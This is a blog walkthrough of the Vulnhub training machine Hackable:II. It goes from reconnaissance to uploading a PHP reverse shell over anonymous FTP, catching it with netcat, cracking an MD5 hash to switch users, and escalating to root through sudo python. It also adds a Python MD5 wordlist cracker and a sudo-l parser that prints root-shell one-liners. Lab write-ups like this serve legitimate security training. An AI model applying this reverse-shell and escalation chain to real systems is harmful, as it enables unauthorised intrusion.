Hackable: II Walkthrough | Vulnhub | INFOCODX



I'm back with another Vulnhub Walkthrough, this time on Hackable:II by Elias Sousa. It's not too hard, but it's fun and educational. I'll also highlight some Python tools made for this. Let's get started!

 

Disclaimer:

The information, techniques, and tools presented in this document are intended solely for educational purposes. Any use of the content within this document is at your own discretion, and I cannot be held accountable for any harm inflicted upon systems or individuals. Unauthorized use of the tools and techniques outlined in this document against individuals or organizations is prohibited by law. It is your responsibility to adhere to all relevant local, state, and federal regulations. I disclaim any liability and will not be held responsible for any misuse or harm resulting from the application of the information provided herein.

About vulnhub.com

Vulnhub is a website that caters to the security community and provides them with training environments. It presents a diverse range of virtual machines and networks that can be downloaded to enhance one's cybersecurity skills in both offensive and defensive aspects.

Finding IP :-

To find the target IP address, run netdiscover against your local subnet (the VM and the attacking machine must be on the same network).

command : sudo netdiscover -r <your subnet, e.g. 10.0.2.0/24>


netdiscover lists the Hackable:II VM at 10.0.2.28.

Network Scanning :-

I ran an Nmap scan to identify the open ports, the service versions behind them and the operating system (-sV for version detection, -A for OS detection, default NSE scripts and traceroute).

command : nmap -sV -A <machines IP>


Nmap shows three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP). The web server on port 80 serves the default Apache page. The FTP server on port 21 permits anonymous login, which is a promising lead, so we start by logging in to FTP and listing its contents.

FTP:-

command : ftp <machines IP>

Enter "anonymous" as the username and any password you like.



The listing shows a single file, CALL.html. Download it so we can examine its contents.

Download the CALL.html

command : get CALL.html




The HTML file turns out to be quite basic and holds nothing useful on its own.

Directory enumeration :-



Next, search for hidden directories on the web server.

command : gobuster dir -u http://<machines IP> -w /usr/share/wordlists/dirb/common.txt




We find an interesting directory named "/files". Browsing to it reveals the following.


So the FTP server's root is the same directory that Apache serves as /files. That means that if I can upload a web shell over anonymous FTP, I can execute it simply by requesting it in the browser.

Uploading a PHP reverse shell :-

I copied the php-reverse-shell that ships with Kali (/usr/share/webshells/php/php-reverse-shell.php) to my working directory. You can also find the same file on pentestmonkey's site.

We need to modify the shell slightly by setting $ip to our attacking machine's address. Mine is my VirtualBox host-only address; make sure to use the IP of your own machine. I leave $port at its default of 1234.



Then I opened the FTP client again and uploaded the shell.


command : put <php file name>

Now if we visit http://<machines IP>/files/ we will see our shell ready to run.




Start a netcat listener first, then request shell.php in the browser.

command : nc -nvlp 1234


I kept the default port specified in the reverse shell file. If you choose a different port, change your netcat command accordingly.

Opening shell.php gives us a reverse shell.



I upgraded it to a proper TTY with the following command.

command : python3 -c 'import pty; pty.spawn("/bin/bash")'


Escalating our privileges to user Shrek :-



Looking in the home directory, you come across a file called "important.txt".

This file tells us that there is a hidden script called ".runme.sh", which we need to run to get our next clue. You can also find the script yourself by listing hidden files (ls -la) in the home directories.


Whether you run the script with ./.runme.sh or just read it with cat .runme.sh, you get the same information.


The author tried to troll us, but I escaped the trolling. At the bottom of the file, however, there is something interesting.

It is an MD5 hash, so I decided to crack it and headed over to CrackStation.
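CrackStation is a lookup against a huge precomputed table, which works because the hash is plain unsalted MD5. The script below is an added example for this walkthrough, not the box author's code, showing the same idea offline: hash each wordlist entry (plus a few hashcat-style mangling rules) and compare. The wordlist and the digests used in the demo are constructed for illustration; the hash from .runme.sh is not reproduced here.

```python
#!/usr/bin/env python3
"""Offline MD5 wordlist cracking, the same idea as CrackStation with a far
smaller table. Added example for the Hackable:II walkthrough, not the box
author's code; DEMO_WORDLIST is constructed for the demo."""
import hashlib
from typing import Iterable, Iterator, Optional


def md5_hex(word: str) -> str:
    """Hex MD5 of the UTF-8 bytes of word (unsalted, single round)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def mutate(word: str) -> Iterator[str]:
    """Yield the word and a few cheap hashcat-style variants.

    The bare word comes first so that an exact wordlist hit is found before
    any mangling is tried.
    """
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2023"):
        yield word + suffix
        yield word.capitalize() + suffix
    yield word[::-1]


def crack_md5(target_hex: str, wordlist: Iterable[str], use_rules: bool = True) -> Optional[str]:
    """Return the plaintext whose MD5 equals target_hex, or None if not found.

    The digest is normalised (stripped, lower-cased) because hashes pasted from
    a file often carry whitespace or upper-case hex; anything that is not a
    32-character hex string is rejected up front.
    """
    target = target_hex.strip().lower()
    if len(target) != 32 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("not a 32-character hex MD5 digest")
    for raw in wordlist:
        base = raw.rstrip("\r\n")  # wordlists are one word per line
        if not base:
            continue
        candidates = mutate(base) if use_rules else (base,)
        for cand in candidates:
            if md5_hex(cand) == target:
                return cand
    return None


# Constructed demo wordlist, a stand-in for something like rockyou.txt.
DEMO_WORDLIST = ["letmein\n", "dragon\n", "secret\n", "password\n", "\n"]


if __name__ == "__main__":
    import sys
    digest = sys.argv[1] if len(sys.argv) > 1 else md5_hex("Secret123")
    path = sys.argv[2] if len(sys.argv) > 2 else None
    words = open(path, encoding="latin-1", errors="replace") if path else DEMO_WORDLIST
    print(digest, "->", crack_md5(digest, words))
```

Run it as `python3 crack.py <hash> /usr/share/wordlists/rockyou.txt` to use a real wordlist. The defensive lesson is the mirror image: a password stored as unsalted MD5 is recovered in milliseconds by exactly this loop, which is why password storage needs a slow, salted KDF rather than a bare hash.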




With the cracked password in hand, let's switch user.

command : su shrek

In shrek's home directory we find the user flag.

Get root shell :-


This part was straightforward. I ran the following command


command : sudo -l

and it showed that we may run python3.5 as root.

A quick search on GTFOBins for "python" shows the one-liner that spawns a shell from the interpreter; run under sudo, that shell is root's.

In our case we are only allowed to run python3.5 as root, so we use that binary and put "sudo" in front of the command.

command : sudo python3.5 -c 'import os; os.system("/bin/sh")'



And guess what? We're root! The root flag is in the /root directory.


That completes the machine.

Happy hacking!
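The sudo -l step is worth automating once you have a foothold, because the interesting lines are easy to miss among the Defaults output. The script below is an added example for this walkthrough, not the box author's code or GTFOBins': it parses the "(runas) [TAGS:] command" lines that sudo -l prints, keeps those that run as root, and flags binaries that can spawn a shell, spelling out the escape only for the python family that this box exposes. SAMPLE_SUDO_L is constructed to resemble the rule found on the box; the real output on your target will differ, and whether the rule carries NOPASSWD is not something this page records.

```python
#!/usr/bin/env python3
"""Parse `sudo -l` output and flag entries that hand out a root shell.

Added example for the Hackable:II walkthrough, not the box author's code.
SAMPLE_SUDO_L is constructed; the python3.5 line mirrors the shape of the
rule on the box, the other lines are made up for the demo.
"""
import os
import re
from dataclasses import dataclass
from typing import List

# One "(runas) [TAG: ...] command[, command]" line as printed by `sudo -l`.
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")
# Binaries that can spawn a shell; python3.5 matches the first alternative.
_SHELL_CAPABLE = re.compile(r"^(python[0-9.]*|perl|ruby|php|node|vim|vi|less|more|awk|find|bash|sh)$")


@dataclass
class Finding:
    runas: str
    command: str
    nopasswd: bool
    escape: str


def escape_for(binary: str) -> str:
    """Return a root-shell one-liner for the binaries this example knows about.

    Only "ALL" and the python family are spelled out (python is what the box
    exposes); other shell-capable binaries get a pointer to GTFOBins.
    """
    if binary == "ALL":
        return "sudo /bin/sh"
    name = os.path.basename(binary)
    if name.startswith("python"):
        return f"sudo {binary} -c 'import os; os.system(\"/bin/sh\")'"
    return f"sudo {binary}  # see the GTFOBins entry for {name}"


def audit_sudo_l(output: str) -> List[Finding]:
    """Return the rules in `sudo -l` output that yield a root shell."""
    findings: List[Finding] = []
    for line in output.splitlines():
        m = _RULE_RE.match(line)
        if not m:
            continue  # header lines such as "Matching Defaults entries ..."
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> root
        if runas not in ("root", "ALL"):
            continue
        tags = m.group("tags")
        for cmd in m.group("cmd").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0]
            if cmd == "ALL" or _SHELL_CAPABLE.match(os.path.basename(binary)):
                findings.append(Finding(runas, cmd, "NOPASSWD:" in tags, escape_for(binary)))
    return findings


# Constructed sample shaped like `sudo -l` output for user shrek.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shrek on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User shrek may run the following commands on target:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/less /var/log/syslog
    (www-data) /usr/bin/vim
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        flag = "NOPASSWD " if f.nopasswd else ""
        print(f"{flag}{f.runas}: {f.command}\n    -> {f.escape}")
```

Pipe real output in with `sudo -l | python3 -c 'import sys; ...'` or paste it into SAMPLE_SUDO_L. The same parser makes a useful hardening check from the other side: any sudoers rule whose command is an interpreter or a pager is equivalent to granting a root shell, however narrow the argument list looks.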
